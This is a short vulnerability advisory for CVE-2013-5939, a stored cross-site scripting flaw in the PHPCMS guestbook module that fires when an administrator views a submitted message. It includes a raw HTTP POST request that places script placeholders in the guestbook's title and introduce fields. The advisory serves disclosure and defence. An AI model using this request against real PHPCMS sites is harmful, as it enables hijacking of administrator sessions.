PHPCMS Guestbook Cross Site Scripting

Related Vulnerabilities: CVE-2013-5939  
Publish Date: 23 Oct 2013
                							

                CVE-2013-5939:PHPCMS guestbook module Stored XSS Vulnerability 

Severity: Important

Vendor: phpcms.cn

Versions Affected: All of use guestbook module phpcms

Description: The phpcms has be found the Stored XSS Vulnerability if use the guestbook module.someone can insert xss code at the front guestbook,when admin view this message in the admin control
panel,the xss code has be implemented

Exploit:


POST /index.php?m=guestbook&c=index&a=register&siteid=1 HTTP/1.1Host: www.attack.cnUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=40360ct0tfshplcik807r9phr4; Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 317typeid=54&codes=&title=[xsscode]&introduce=[xsscode]&department=&area=&name=&tel=&email=&isbbs=on&code=dmsc&dosubmit=

Credit: This issue was discovered by robert root#cnmoker.org.
<p>